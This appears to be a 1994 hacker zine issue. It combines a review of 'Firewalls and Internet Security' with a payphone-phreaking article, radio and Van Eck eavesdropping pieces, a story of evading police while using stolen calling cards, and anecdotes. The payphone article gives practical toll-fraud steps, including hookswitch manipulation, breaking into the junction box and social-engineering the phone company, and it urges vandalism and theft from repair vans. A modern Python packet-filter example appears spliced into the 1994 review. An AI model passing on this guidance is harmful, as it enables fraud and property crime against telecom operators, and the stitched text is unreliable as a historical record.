three appendixes, a bibliography, a list of 42 bombs and an index. 


The book starts with overall explanations and an overview of the 
TCP/IP protocol. More than an overview of the actual TCP/IP protocol, 
it is a review of services often used with that protocol, and the 
security risks they pose. In that chapter the authors define
"bombs" -- as particularly serious security risks. Despite that fact,
and the tempting bomb list in the end, this book is not a guide for 
someone with passing knowledge of Internet security who wants to learn 
more explicit details about holes. It is, in the authors’ words, "not 
a book on how to administer a system in a secure fashion." 


FIREWALLS (Including the TCP/IP overview: pages 19-131) 


What is a firewall and how is it built?(*) If you don’t know that,
then definitely get this book. The Firewalls chapter is excellent
even for someone with a passing knowledge of firewalls or general
knowledge of what they set out to accomplish. You might still
learn more.


In the Firewalls chapter, the authors explain the firewall philosophy
and types of firewalls. Packet-filtering gateways rely on rule-based
packet filtering to protect the gateway from various types of attacks.
You can filter everything and achieve the same effect of disconnecting
from the Internet, you can filter everything from misbehaving sites,
you can allow only mail in, and so on. An application-level gateway
relies on the applications set on the firewall. Rather than let a
router filter traffic based on rules, one can strip a machine clean
and only run desired services and even then, more secure versions
of those services can be run. Circuit-level gateways relay data
between the gateway and other networks. The relay programs copy
data from inside the firewall to the outside, and log their activity.
Most firewalls on the Internet are a combination of these gateways.


Next, the authors explain how to build an application-level gateway
based on the work they have done with the research.att.com gateways.
As mentioned, this chapter is indeed very good. They go over setting
up the firewall machines, router configuration for basic packet
filtering (such as not allowing Internet packets that appear to come
from inside your network). They show, using the software on the
AT&T gateway as example, the general outline of proxies and give some
useful advice. That chapter is very interesting; reading it with Bill
Cheswick’s (older) paper, "The Design of a Secure Internet Gateway" makes
it even better. The examples given, like the NFS and X proxies run on the
gateway, are also interesting by themselves.
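
The packet-filtering policies named above (drop Internet packets that claim an inside source address, filter everything from a misbehaving site, allow only mail in) can be written as a first-match rule list. This is an added example, not code from the book or from the AT&T gateway; the addresses (documentation ranges), interface names, the "established" rule and the outbound rule are assumptions made for the illustration.

```python
"""First-match packet filter for the policies named in the review (constructed example)."""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Optional

# All addresses are assumptions taken from the documentation ranges.
ANY = ip_network("0.0.0.0/0")
INSIDE = ip_network("192.0.2.0/24")       # the protected network
MAIL_HUB = ip_network("192.0.2.25/32")    # the one host allowed to receive mail
BAD_SITE = ip_network("203.0.113.0/24")   # a "misbehaving site"


@dataclass(frozen=True)
class Packet:
    iface: str                    # interface it arrived on: "outside" or "inside"
    src: str
    dst: str
    proto: str                    # "tcp", "udp" or "icmp"
    dport: Optional[int] = None
    syn_only: bool = False        # TCP segment that opens a connection (SYN, no ACK)


@dataclass(frozen=True)
class Rule:
    action: str                   # "permit" or "deny"
    iface: str
    src: object = ANY
    dst: object = ANY
    proto: Optional[str] = None   # None matches any protocol
    dport: Optional[int] = None   # None matches any port
    established: bool = False     # match only TCP segments that do not open a connection
    note: str = ""

    def matches(self, p: Packet) -> bool:
        if p.iface != self.iface:
            return False
        if ip_address(p.src) not in self.src or ip_address(p.dst) not in self.dst:
            return False
        if self.proto is not None and p.proto != self.proto:
            return False
        if self.dport is not None and p.dport != self.dport:
            return False
        if self.established and (p.proto != "tcp" or p.syn_only):
            return False
        return True


# Order matters: the anti-spoofing and bad-site denies come before any permit.
RULES = [
    Rule("deny", "outside", src=INSIDE, note="spoofed: inside source seen on outside interface"),
    Rule("deny", "outside", src=BAD_SITE, note="misbehaving site"),
    Rule("permit", "outside", dst=MAIL_HUB, proto="tcp", dport=25, note="inbound mail only"),
    # Stateless approximation of "reply traffic": it trusts the TCP flags in the packet.
    Rule("permit", "outside", dst=INSIDE, proto="tcp", established=True, note="reply to inside client"),
    Rule("permit", "inside", src=INSIDE, note="inside hosts may open connections outward"),
]


def decide(packet, rules=RULES):
    """Return (action, note) of the first matching rule; anything unmatched is denied."""
    for rule in rules:
        if rule.matches(packet):
            return rule.action, rule.note
    return "deny", "default deny"


def spoof_check_order_matters():
    """Same spoofed packet against the correct order and a list with the mail permit first."""
    spoofed_mail = Packet("outside", "192.0.2.7", "192.0.2.25", "tcp", 25, syn_only=True)
    misordered = [RULES[2], RULES[0]] + RULES[3:]
    return decide(spoofed_mail)[0], decide(spoofed_mail, misordered)[0]


# Constructed sample packets, not captured traffic.
SAMPLES = [
    ("mail from a remote MTA", Packet("outside", "198.51.100.9", "192.0.2.25", "tcp", 25, True)),
    ("telnet attempt from outside", Packet("outside", "198.51.100.9", "192.0.2.10", "tcp", 23, True)),
    ("spoofed inside source (NFS port)", Packet("outside", "192.0.2.7", "192.0.2.10", "udp", 2049)),
    ("misbehaving site sending mail", Packet("outside", "203.0.113.5", "192.0.2.25", "tcp", 25, True)),
    ("reply to an inside client", Packet("outside", "198.51.100.9", "192.0.2.10", "tcp", 1025, False)),
    ("inside client opening a connection", Packet("inside", "192.0.2.10", "198.51.100.9", "tcp", 80, True)),
]

if __name__ == "__main__":
    for label, pkt in SAMPLES:
        action, note = decide(pkt)
        print(f"{action:6}  {label:36}  [{note}]")
    print("spoofed mail, correct vs misordered rules:", spoof_check_order_matters())
```
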


INTERNET SECURITY (pages 133-237) 


Internet security is a misleading name. This part might also be
called "Everything else." Most of it is a review of hacker attacks
logged by AT&T’s gateway probes, and of their experience with a hacker.
But there is also a chapter dedicated to computer crime and the law --
computer crime statutes, log files as evidence, the legalities of
monitoring intruders and letting them keep their access after finding
them, and the ethics of many actions performed on the Internet; plus
an introduction to cryptography under Secure Communication over Insecure
Networks. The later sections are good. The explanation of several
encryption methods and short reviews of applications putting them to use
(PEM, PGP and RIPEM) are clear (as clear as cryptography can get) and the
computer crime sections are also good -- although I’m not a lawyer and
therefore cannot really comment on it, and notes that look like "5 USC
552a(b) (c) (10)" cause me to shudder. It’s interesting to note that some
administrative functions as presented in this book, what the authors call
counter-intelligence (reverse fingers and rusers) and booby traps and fake
password file are open for ethical debate. Perhaps they are not illegal,
but counter-intelligence can surely ring the warning bells on the site being
counter-fingered if that site itself is security aware.


That said, let’s move to hackers. I refer to these as "hacker studies",
or whatever, for lack of a better name. This is Part III (A Look
Back), which contains the methods of attacks (social engineering,
stealing passwords, etc), the Berferd incident (more on that later),
and an analysis (statistical and otherwise) of the Bell Labs gateway
logs.


Back to where we started, there is nothing new or innovative about
these chapters. The Berferd hacker case is not new, it is mostly just
uninteresting. The chapter is mostly a copy (they do state this) of
Bill Cheswick’s paper titled "A Night with Berferd, in Which a Cracker
is Lured, Endured and Studied." The chapter concerning probes and
door-knob twisting on the Internet (Traps, Lures, and Honey Pots)
is mostly a copy (they do not state this) of Steven Bellovin’s paper
titled, "There Be Dragons". What do we learn from the hacker-related
chapters? Let’s take Berferd: The Sendmail DEBUG hole expert. After
mailing himself a password file and receiving it with a space after
the username, he tries to add accounts in a similar fashion. Cheswick
calls him "flexible". I might have chosen another F-word. Next are
the hacker logs. People finger. People tftp /etc/passwd. People try
to rlogin as bin. There are no advanced attacks in these sections.


Compared with the scary picture painted in the Firewalls chapter -- 
that of the Bad Guy spoofing hostnames, flooding DNS caches, faking
NFS packets and much more -- something must have gone wrong. (**) 


Still, I cannot say that this information is totally useless. It is, 
as mentioned, old. It is available and was available since 1992 
on ftp://research.att.com:{/dist/internet_security,/dist/smb}. (***) 


The bottom line is that this book is, in my opinion, foremost and upmost
a Firewaller’s book. The hacker section could have been condensed
into Appendix D, a copy of the CERT advisory about computer attacks
("Don’t use guest/guest. Don’t leave root unpassworded.") It really
takes ignorance to believe that inexperienced hackers can learn "hacker
techniques" and become mean Internet break-in machines just by reading
_Firewalls and Internet Security_. Yes, even the chapter dedicated
to trying to attack your own machine to test your security (The Hacker’s
Workbench) is largely theoretical. That is to say, it doesn’t go above
comments like "attack NFS". The probes and source code supplied there are
for programs like IP subnet scanners and so on, and not for "high-level"
stuff like ICMP bombers or similar software; only the attacks are
mentioned, not the implementation. This is, by the way, quite
understandable and expected, but don’t buy this book if you think it
will make you into some TCP/IP attacker wiz.


In summary: 


THE GOOD 

The Firewalls part is excellent. The other parts not related to
hacker-tracking are good as well. The added bonuses -- in the form
of a useful index, a full bibliography (with pointers to FTP sites),
a TCP port list with interesting comments and a great (running out
of positive descriptions here) online resources list -- are also
grand (whew).


THE BAD


The hacker studies sections, based on old (circa 1992) papers, are
not interesting for anyone with any knowledge of hacking and/or
security who had some sort of encounters with hackers. People without
this knowledge might either get the idea that: (a) all hackers are
stupid and (b) all hackers are Berferd-style system formatters. Based on
the fact that the authors do not make a clear-cut statement about
hiring or not hiring hackers, they just say that you should think
if you trust them, and that they generally appear not to have a total
draconian attitude towards hackers in general, I don’t think this was
intentional.


THE UGLY (For the nitpickers) 


There are some nasty little bugs in the book. They’re not errors
in that sense of the word; they’re just kind of annoying -- if you’re
sensitive about things like being called a hacker or a cracker, they’ll
annoy you. Try this: although they explain why they would use the term 
"hacker" when referring to hackers (and not "eggsucker", or "cracker"), 
they often use terms like "Those With Evil Intention". Or, comparing 
_2600 Magazine_ to the Computer underground Digest. 


B- 


(*) From the Firewalls FAQ <fwalls-faq@tis.com>:
``A firewall is any one of several ways of protecting one
network from another untrusted network. The actual mechanism
whereby this is accomplished varies widely, but in
principle, the firewall can be thought of as a pair of
mechanisms: one which exists to block traffic, and the other
which exists to permit traffic. Some firewalls place a
greater emphasis on blocking traffic, while others emphasize
permitting traffic.''


(**) This would be a great place to start a long and boring discussion 
about different types of hackers and how security (including firewalls)
affect them. But... I don’t think so. 


(***) ftp://research.att.com:/dist/internet_security/firewall.book also 
contains, in text and PostScript, the list of parts, chapters and 
sections in the book, and the Preface section. For that reason, 
those sections weren’t printed here. 

All the papers mentioned in this review can be found on that FTP 
site. 


Announcing Bellcore’s Electronic Information Catalog for Industry 
Clients... 


To access the online catalog: 


telnet info.bellcore.com 
login: cat10 


or dial 201-829-2005 
annex: telnet info 
login: cat10 


[Order up some E911 Documents Online! ] 


THE CURMUDGEON


Bill Clinton promised good health care coverage for everyone.
Bill Clinton promised jobs programs for the unemployed.
Bill Clinton promised that everyone who wanted could serve in the military.
Bill Clinton promised a lot. So does the Curmudgeon.
But unlike Bill Clinton, we’ll deliver...


For only $10 a year (12 issues) you’ll get alternative music reviews and 
interviews, political reporting, anti-establishment features and 
commentary, short fiction, movie reviews, book reviews, and humor. Learn 
the truth about the Gulf War, Clipper, and the Selective Service System. 
Read everything you wanted to know about bands like the Offspring, R.E.M., 
the Cure, Porno for Pyros, Pearl Jam, Dead Can Dance, Rhino Humpers, and 
Nine Inch Nails. Become indoctrinated by commentary that just might change 
the way you think about some things. Subscribe to the Curmudgeon on paper for 
$10 or electronically for free. Electronic subscribers don’t get 
everything that paying subscribers do like photos, spoof ads, and some 
articles. 


Paper: send $10 check or money order to the Curmudgeon 
4505 University Way N.E. 
Box 555 
Seattle, Washington 
98105 
Electronic: send a request to rodneyl@u.washington.edu 


-Underground - Editorials Reviews News Other Really Cool Stuff-


Published Quarterly/Semi-Quarterly By Fennec Information Systems
This is one of the more popular new electronic publications. To
get your free subscription, please see the addresses below.
Don’t miss out on this newsworthy publication. We are getting
hundreds of new subscriptions a month. This quarterly was promoted
in Phrack Magazine. If you don’t subscribe, you’re only cheating
yourself. Have a great day...and a similar tomorrow


* Coming soon * A Windows-based help file containing all of the issues
                of the magazine as well as extensive bio’s of all of the
                editors.


Subscription Requests: sub@fennec.com
Comments to Editors  : editors@fennec.com
Back issues via Ftp  : etext.archive.umich.edu /pub/Zines/JAUC
                       fc.net /pub/tjoauc
Submissions          : submit@fennec.com
Finger info          : dfox@fc.net and kahuna@fc.net


Make the best out of your European pay telephone 
by Onkel Dittmeyer, onkeld@ponton.hanse.de 


Okay guys and girls, let’s come to a topic old like the creation 
but yet never revealed. European, or, to be more exact, German pay 
phone technology. Huh-huh. 


There are several models, round ones, rectangular ones, spiffy
looking ones, dull looking ones, and they all have one thing in
common: If they are something, they are not what the American reader
might think of as a public pay telephone. Unlike their U.S. brothers,
the German payphones always operate off a regular customer-style
telephone line, and therefore they’re basically all COCOTS, which
makes it a lot easier to screw around with them.


Let’s get on with the models here. You are dealing with two 
classes; coin-op ones and card-op ones. All of them are made by 
Siemens and TELEKOM. The coin-op ones are currently in the process 
of becoming extinct while being replaced by the new card-op’s, and rather 
dull. Lacking all comfort, they just have a regular 3x4 keypad, 
and they emit a cuckoo tone if you receive a call. The only way to 
tamper with these is pure physical violence, which is still easier 
than in the U.S.; these babies are no fortresses at all. Well, while 
the coin-op models just offer you the opportunity of ripping off 
their money by physically forcing them open, there is a lot more 
fun involved if you’re dealing with the card babies. They are really 
spiffy looking, and I mean extraordinary spiffy. Still nothing 
compared to the AT&T VideoFoNeZ, but still really spiffy. The 2-line 
pixel-oriented LCD readout displays the pure K-Radness of its
inventors. Therefore it is equipped with a 4x4 keypad that has a lot 
of (undocumented) features like switching the mother into touch-tone 
mode, redial, display block etc. Plus, you can toggle the readout 
between German, English, and French. There are rumors that you can 
put it into Mandarin as well, but that has not been confirmed yet. 


Let’s get ahead. Since all payphones are operating on a regular 
line, you can call them up. Most of them have a sign reading their 
number, some don’t. For those who don’t, there is no way for you to 
figure out their number, since they did not invent ANI yet over here
in the country famous for its good beer and yodel chants. Well, try 
it. I know you thought about it. Call it collect. Dialing 010 will 
drop you to a long-distance operator, just in case you didn’t know. 
He will connect the call, since there is no database with all the 
payphone numbers, the payphone will ring, you pick up, the operator 
will hear the cuckoo tone, and tell you to fuck off. Bad luck, eh? 


This would not be Phrack if there would be no way to screw it.
If you examine the hook switch on it closely, you will figure out
that, if you press it down real slow and carefully, there are two
levels at which it provokes a function; the first will make the phone
hang up the line, the second one to reset itself. Let me make this
a little clearer in your mind.


                          ---    <--- totally released
                           |
                           |
                           |     <--- hang up line
 press to this level -->   |
                           |     <--- reset
                           |
                          ---    <--- totally hung up


Involves a little practice, though. Just try it. Dial a number
it will let you dial, like 0130, then it will just sit there and
wait for you to dial the rest of the number. Start pressing down
the hookswitch really slow till the line clicks away into suspense,
if you release it again it will return you to the dial tone and
you are now able to call numbers you aren’t supposed to call, like
010 (if you don’t have a card, don’t have one, that’s not graceful),
or 001-212-456-1111. Problem is, the moment the other party picks
up, the phone will receive a charge subtraction tone, which is a
16kHz buzz that will tell the payphone to rip the first charge unit,
30 pfennigs, off your card, and if you don’t have one inserted and
the phone fails to collect it, it will go on and reset itself
disconnecting the line. Bad luck. Still good enough to harass your
favorite fellas for free, but not exactly what we’re looking for,
right? Try this one. Push the hook lever to the suspension point,
and let it sit there for a while, you will have to release it a
bit every 5 seconds or so, or the phone will reset anyway. If you
receive a call while doing this, a buzz will appear on the line.
Upon that buzz, let the lever go and you’ll be connected, and
the cuckoo tone will be shut up! So if you want to receive a collect
call, this is how you do it. Tell the operator you accept the charges,
and talk away. You can use this method overseas, too: Just tell your
buddy in the states to call Germany Direct (800-292-0049) and make
a collect call to you waiting in the payphone, and you save a cool
$1.17 a minute doing that. So much for the kids that just want to
have some cheap fun, and on with the rest.


Wasting so much time in that rotten payphone, you probably 
noticed the little black box beneath the phone. During my, erm, 
research I found out that this box contains some fuses, a standard 
Euro 220V power connector, and a TAE-F standard phone connector. 
Completing the fun is the fact that it’s extremely easy to pry it 
open. The TAE-F plug is also bypassing the phone and the charge 
collection circuits, so you can just use it like your jack at home. 
Bring a crowbar and your laptop, or your Pentium tower, power it over 
the payphone and plug your Dual into the jack. This way you can even 
run a board from a payphone, and people can download the latest 
WaReZzzZzz right from the booth. It’s preferable to obtain a key for 
the lock of the box, just do some malicious damage to it (yes, let 
the animal take control), and call Telekom Repairs at 1171 and they 
will come and fix it. Since they always leave their cars unlocked, 
or at least for the ones I ran across, you can either take the whole
car or all their k-rad equipment, manuals, keys, and even their lunch
box. But we’re shooting off topic here. The keys are usually general
keys, meaning they fit on all payphones in your area. There should also
be a nationwide master key, but the German Minister of
Telecommunications is probably keeping that one in his desk drawer.


The chargecards for the card-op ones appear to have a little chip
on them, where each charge unit is being deducted, and so far no-one
could figure out how it works, or how to refill the cards or make a
fake one, but a lot of German phreaks are busy trying to figure that
out.


A good approach is also social-engineering Telekom so they turn 
off the charge deduction signal (which doesn’t mean the calls are free,
but the buzz is just not transmitted any more) so the phone doesn’t
receive a signal to charge you any money no matter where you call.
The problem with this method is that the word will spread in the
neighborhood that there is a payphone where you can call for free, 
and therefore it will be so crowded that you can’t use it, and 
the phone pals will catch up fast. It’s fun though, I tried it, and 
I still get free drinks at the local pub for doing it. 


Another k-rad feature on them is the built-in modem that they use 
to get their software. On a fatal error condition they appear to dial 
a telecom number and download the latest software just how their ROM 
commands them to do. We will shortly take a phone, install it
somewhere else and figure out where it calls, what the protocol is and
what else is being transmitted, but that will probably be in another 
Phrack. 


If you found out anything that might be of interest, you are 
welcome to mail it to onkeld@ponton.hanse.de using the public key 
beneath. Unencrypted mail will be killed since ponton.hanse.de is 
run by a paranoid bitch that reads all traffic just for the hell 
of it, and I don’t want the phedzZz to come and beat me over the
head with a frozen chunk o’ meat or worse.


Stay alert, watch out and have fun... 




 ((___))                INFORMATION IS JUNK MAIL                ((___))
 [ x x ]                                                        [ x x ]
  \   /                   cDc communications                     \   /
  (' ')            -cDc- CULT OF THE DEAD COW -cDc-              (' ')
   (U)                                                            (U)
 deal with it,     presents unto you 10 phat t-files,      deal with it,
 SUCKER                 fresh for July 1994:                     SUCKER

 New gNu NEW gnU new GnU nEW gNu neW gnu nEw GNU releases for July, 1994:


/Text Files\ 


261: "Interview with Greta Shred" by Reid Fleming. Reid conducts an in-depth
interview with the editor of the popular ’zine, _Mudflap_. 


262: "_Beverly Hills 90210_ as Nostalgia Television" by Crystal Kile. Paper 
presented for the 1993 National Popular Culture Association meeting in New 
Orleans. 


263: "What Color Is the Sky in Your World?" by Tequila Willy. Here’s your
homework, done right for you by T. "Super-Brain" Willy.


264: "Chicken Hawk" by Mark E. Dassad. Oh boy. Here’s a new watermark low 
level of depravity and sickness. If you don’t know what a "chicken hawk" is 
already, read the story and then you’ll understand.


265: "Eye-rON-EE" by Swamp Ratte’. This one’s interesting ’cause only about
half-a-dozen or so lines in it are original. The rest was entirely stuck
together from misc. files on my hard drive at the time. Some art guy could say
it’s a buncha post-this&that, eh? Yep.


266: "Interview with Barbie" by Clench. Barbie’s got her guard up. Clench 
goes after her with his rope-a-dope interview style. Rope-a-dope, rope-a-dope.
This is a boxing reference to a technique mastered by The Greatest of All Time,
Muhammad Ali.


267: "About a Boy" by Franken Gibe. Mr. Gibe ponders a stolen photograph.
Tiny bunnies run about, unhindered, to find their own fate. 


268: "Mall Death" by Snarfblat. Story about a Dumb Girl[TM]. Are you 
surprised? 


269: "Prophile: Future History" by THE NIGHTSTALKER. It’s the future, things 
are different, but the Master Hacker Dude lives on. 


270: "Time out for Pop" by Malcolm D. Moore. Sad account of a hopless-pop. 


/cDc Gnuz\ 


"And that no man might buy or sell, save he that had the mark, or the name 
of the Cow, or the number of his name. Here is wisdom. Let him that hath 
understanding count the number of the Cow: for it is the number of a man; and 
his number is eight billion threescore and seven million nine hundred forty-
four thousand three hundred threescore and two. So it is written." -Omega


Yowsah, yowsah, yowsah. JULY once again, the super-hooray month which marks 
cDc’s 8th year of existence. Outlasting everyone to completely rule and 
dominate all of cyberspace, blah blah blah. Yeah, think a special thought 
about cDc’s significance in YOUR life the next time you go potty. Name your 
firstborn child after me, and we’ll call it karmicly even, pal. My name is
Leroy. 


We’re always taking t-file submissions, so if you’ve got a file and want to 
really get it out there, there’s no better way than with cDc. Upload text to 
The Polka AE, to sratte@phantom.com, or send disks or hardcopy to the cDc post 
office box in Lubbock, TX. No song lyrics and bad poetry please; we’ll leave
that to the no-class-havin’, bottom-feeder shoveling orgs. out there. 


News item of the month, as found by Count Zero: 


"ROTTING PIG FOUND IN DITCH 


VERDEN, OKLAHOMA — Responding to a tip from an employee, Verden farmer Bill 
McVey found a rotting pig in a ditch two miles north of town. Farmer McVey 
reported the pig to the authorities, because you cannot, legally, just leave a 
dead pig in a ditch. You must dispose of your deceased livestock properly. 
There are companies that will take care of this for you. As for proper 
disposal of large dead animals, McVey contracts with Used Cow Dealer." 


"...and the rivers ran red with the bl100d 
of the Damned and the Deleted..." 
—Dem0nSeed 


S. Ratte’
cDc/Editor and P|-|Earl3zz |_3@DeRrr 


"We’re into t-files for the groupies and money." 
Middle finger for all. 

Write to: cDc communications, P.O. Box 53011, Lubbock, TX 79453.
Internet: sratte@phantom.com.


ALL cDc FILES LEECHABLE FROM FTP.EFF.ORG IN pub/Publications/CuD/CDC.


[ Radio Modification Project ]


Tuning in to Lower Frequency Signals June 26, 1994 


[ By: Grendel / 905 ]===> 


The lower frequency regions of the radio spectrum are often
ignored by ham’ers, pirates, and DX’ers alike due to the
relatively little known ways of tuning in. The following article
will detail how to construct a simple-made antenna to tune in
to the LF’s and show how to adjust an amateur band type radio
to receive the desired signals.


The lower frequency spectrum has been made to include
the very low frequency ("VLF" 2 kHz to 30 kHz) band and a
small part of the medium frequency ("MF" 300 - 500 kHz) band.
For our purposes, a suitable receiver must be able to cover
the 2 kHz to 500 kHz range as well as being calibrated at 10
kHz intervals (standard). The receiver must also be capable of
covering AM and CW broadcasts. For best capabilities, the
receiver should also be able to cover LSB ("lower side band")
and USB ("upper side band").


The Receiving System 




The receiver I use consists of a standard amateur HF ("High
Frequency") band receiver adjusted between the 3,500 and 4,000
kHz bands. This causes the receiver to act as a tuneable IF
("Intermediate Frequency") and also as demodulator. You will
also require a wideband LF ("Low Frequency") converter which
includes a 3,500 kHz crystal oscillator. See Fig. 1:

==[ Fig 1. Block Diagram ]

   \ANT/
    \ /     crystal
     |         |
 .----------------.     .----------------.
 |  2 - 500 kHz   |     |  3-4000 kHz    |
 |   Converter*   |-----|  IF Receiver   |---OUTPUT
 '----------------'     '----------------'
     |
    GND


    *The converter is a circuit board type 80D/L-101/PCB
     available from L.F. Engineering Co, 17 Jeffry Road,
     East Haven CT, 06513 for $43 US including S & H. One
     may be constructed to work with your receiver (but
     at a higher price no doubt).


Phono jack plugs and sockets are used for the interconnections
throughout the receiving system and the converter and
receiver (7) are connected with RG58 coax cable of no greater
length than 4 ft.

When tuning, the station frequency is measured by deducting 
3,500 kHz from the scale on the main receiver (ie. 340 kHz = 
3,840 kHz on the main receiver, 120 = 3,620 kHz, 95 = 3,595 
kHz, etc.) 


The Ferrite End-fed Antenna 

This is a small antenna designed to tune between 95 kHz and 
500 kHz. It consists of a coil wound around a ferrite rod, with 
a 4 ft. lead. 


Materials: 
    o 67 7/8" x 3/8" ferrite rod
    o 5" 24 SWG double cotton covered copper wire
    o 2 PLASTIC coated terry clips
    o a wood or plastic base (8 1/2" x .8" x .5")
    o 2 standard, two-gang 500 pF tuning capacitors
    o a plastic plate (preferably 2" high)


-- A Few Things on Van Eck’s Method of Eavesdropping --
Opticon the Disassembled - UPi


Dr Wim Van Eck was the one who developed the anonymous method for
eavesdropping on computers (and, apparently, not only computers) from a
distance, in the laboratories of Neher, Holland. This method is based on
the fact that monitors transmit electromagnetic radiation. As a device,
it is not too complex and it can be constructed by an experienced
electronics phreak. It uses a simple-direction antenna which grabs
monitor signals from about 800 meters away. Simplified schematics are
available from Consumertronics.


TEMPEST stands for Transient ElectroMagnetic Pulse Emanation STandard.
It concerns the quantity of electromagnetic radiation from monitors and
televisions, although it can also be detected from keyboards, wires,
printers and central units. There are some security levels at which such
radiation is supposed to be untraceable by Van Eck systems. Those
security levels, or standards, are described thoroughly in a technical
exposition called NACSIM 5100A, which has been classified by the NSA.


Variations in the voltage of the electrical current cause electromagnetic
pulses in the form of radio waves. In cathode ray tube (C.R.T.) devices,
such as televisions and monitors, a source of electrons scans the internal
surface and activates the phosphor. Whether or not the scanning is interlaced
or non-interlaced, most monitors transmit frequencies varying from 50 to 75
Mhz per second. They also transmit harmonic frequencies, multiples of the
basic frequencies; for example a transmitter with a signal of 10 Mhz per second
will also transmit waves of 20, 30, 40 etc. Mhz. Those signals are
weaker because the transmitter itself effaces them. Such variations in the
voltage are what the Van Eck system receives and analyzes.


There are ways to prevent or make it harder for someone to monitor 
your monitor. Obviously you cannot place your computer system 
underground and cover it with a Faraday cage or a copper shield 
( If your case is already that, then you know more about Van Eck 
than I do ). What else ? 


(1) Certain computers, such as Wang’s, prevent such emanations;
give preference to them.


(2) Place your monitor into a grounded metal box, 1.5 cm thick. 


(3) Trace your tracer(s). They gonna panic.


(4) Increase of the brightness and lowering of the contrast 
reduces TEMPEST’s power. Metal objects, like bookshelves, 
around the room, will also help a little bit. 


(5) Make sure that two or more monitors are transmitting at the same 
frequency and let them operate simultaneously; this will confuse 
Van Eck systems. 


(6) Buy or make on your own, a device which will transmit noise 
at your monitor’s frequency. 


(7) Act naturally. That is: 


(a) Call IRC, join #hack and never mumble a single word. 
(b) Read only best selling books. 


(c) Watch television at least 8 hours a day. 


(d) Forget altruism; there is only you, yourself 
and your dick/crack. 


(8) Turn the monitor off. 


-Almost Busted- 
By: Deathstar 


It all started one week in the last month of summer. Only my brother 
and I were at the house for the whole week, so I did whatever I wanted. 
Every night, I would phreak all night long. I would be either at a payphone 
using AT&Tz, or at home sitting on a conference. I would be on the phone 
till at least four or five in the morning. But one night, my luck was running 
thin, and I almost phreaked for the last time. I was at a payphone, using 
cards. I had been there since around twelve midnight.. The payphone was 
in a shopping center with a supermarket and a few other stores. Most every 
thing closed at eleven.. Except for the nearby gas station. Anyway, I was 
on the phone with only one person that night. I knew the card would be dead 
by the end of the night so I went ahead and called him on both of his lines 
with both of the payphones in the complex with the same card. I had talked 
for hours. It started to get misty and hard to see. Then, I noticed a car 
of some kind pulling into the parking lot. I couldn’t tell what kind of 
car it was, because it was so dark. The car started pulling up to me, and
when it was around twenty feet away I realized it was a police car. They
got on the loudspeaker and yelled "Stay where you are!". I dropped the
phone and ran like hell past the supermarket to the edge of the complex.
I went down a bike path into a neighborhood of townhouses. Running across
the grass, I slipped and fell about two or three times. I knew they were
following me, so I had to hide. I ran to the area around the back of
the supermarket into a forest. I smacked right into a fence and fell
on the ground. I did not see the fence since it was so dark. Crawling a
few feet, I laid down and tried to cover my body with some leaves and 
dirt to hide. I was wearing an orange shirt and white shorts. I laid 
as still as I could, covered in dirt and leaves. I could hear the police 
nearby. They had flashlights and were walking through the forest looking 
for me. I knew I would get busted. I tried as hard as I could to keep 
from shaking in fear. I lay there for around thirty minutes. Bugs were 
crawling around on my legs biting me. I was itching all over. I couldn’t 
give up though, because if they caught me I knew that would be the end 
of my phreaking career. I was trying to check if they were still looking 
for me, because I could not hear them. Just as I was about to make a run 
for it, thinking they were gone I heard a police radio. I sat tight again. 
For another hour, I lay there until finally I was sure they were gone. I 
got up and started to run. I made my way through the neighborhood to my
house. Finally I got home. It was around five thirty a.m. I was filthy.
The first thing I did was call the person I was talking to on the payphone 
and tell him what happened. Then, I changed clothes and cleaned myself up. 
I checked my vmb to find that a conference was up. I called it, and told 
my story to everyone on. 


I thought that was the end of my confrontation with the police, but I 
was wrong. The next day I had some people over at my house. Two or Three 
good friends. One of them said that there was a fugitive loose in our 
town. We were bored so we went out in the neighborhood to walk around 
and waste time. Hardly anyone was outside, and police cars were going 
around everywhere. One guy did leave his house but he brought a baseball 
bat with him. We thought it was funny. Anyway, we soon got bored and 
went back home. Watching tv, we turned to the news. They had a Report 
about the Fugitive. We watched. It showed a picture of the shopping 
center I was at. They said "One suspect was spotted at this shopping 
center last night at around four thirty in the morning. The officer 
is around ninety five percent sure that the suspect was the fugitive.
He was wearing an orange shirt and white shorts, and ran when approached."
I then freaked out. They were searching my neighborhood for a fugitive 
that didn’t exist! I called back the guy I was talking to the night 
before and told him, and then told everyone that was on the conference 
the night before. It ended up that the fugitives never even entered
our state. They were caught a week later around thirty miles from
the prison they escaped from. Now I am known by two nicknames. "NatureBoy"
because everyone says I communed with nature for an hour and a half hiding
from the police, and "The Fugitive" for obvious reasons. Anywayz, That’s
how I was almost busted..


-DS


The following is a *true* story. It amused the hell out of me while it
was happening. I hope it isn’t one of those "had to be there" things. 


Copyright 1994 Captain Sarcastic, all rights reserved. 


On my way home from the second job I’ve taken for the extra holiday cash I
need, I stopped at Taco Bell for a quick bite to eat. In my billfold is
a $50 bill and a $2 bill. That is all of the cash I have on my person.
I figure that with a $2 bill, I can get something to eat and not have to
worry about people getting pissed at me.


ME: "Hi, I’d like one seven layer burrito please, to go." 
IT: "Is that it?"

ME: "Yep." 

IT: "That’ll be $1.04, eat here?" 

ME: "No, it’s *to* *go*." [I hate effort duplication.] 


At this point I open my billfold and hand him the $2 bill. He looks at it
kind of funny and


IT: "Uh, hang on a sec, I’ll be right back."


He goes to talk to his manager, who is still within earshot. The 
following conversation occurs between the two of them. 


IT: "Hey, you ever see a $2 bill?" 

MG: "No. A what?" 

IT: "A $2 bill. This guy just gave it to me." 

MG: "Ask for something else, THERE’S NO SUCH THING AS A $2 BILL." [my emp]

IT: "Yeah, thought so."


He comes back to me and says 


IT: "We don’t take these. Do you have anything else?" 
ME: "Just this fifty. You don’t take $2 bills? Why?"

IT: "I don’t know."

ME: "See here where it says legal tender?"

IT: "Yeah."

ME: "So, shouldn’t you take it?" 

IT: "Well, hang on a sec." 


He goes back to his manager who is watching me like I’m going to
shoplift, and


IT: "He says I have to take it."

MG: "Doesn’t he have anything else?" 

IT: "Yeah, a fifty. I’ll get it and you can open the safe and get change."

MG: "I’M NOT OPENING THE SAFE WITH HIM IN HERE." [my emp]

IT: "What should I do?" 


MG: "Tell him to come back later when he has REAL money."

IT: "I can’t tell him that, you tell him."

MG: "Just tell him."

IT: "No way, this is weird, I’m going in back."


The manager approaches me and says 


MG: "Sorry, we don’t take big bills this time of night." [it was 8pm and 
this particular Taco Bell is in a well lighted indoor mall with 100 
other stores. ] 

ME: "Well, here’s a two." 

MG: "We don’t take *those* either." 

ME: "Why the hell not?" 

MG: "I think you *know* why." 

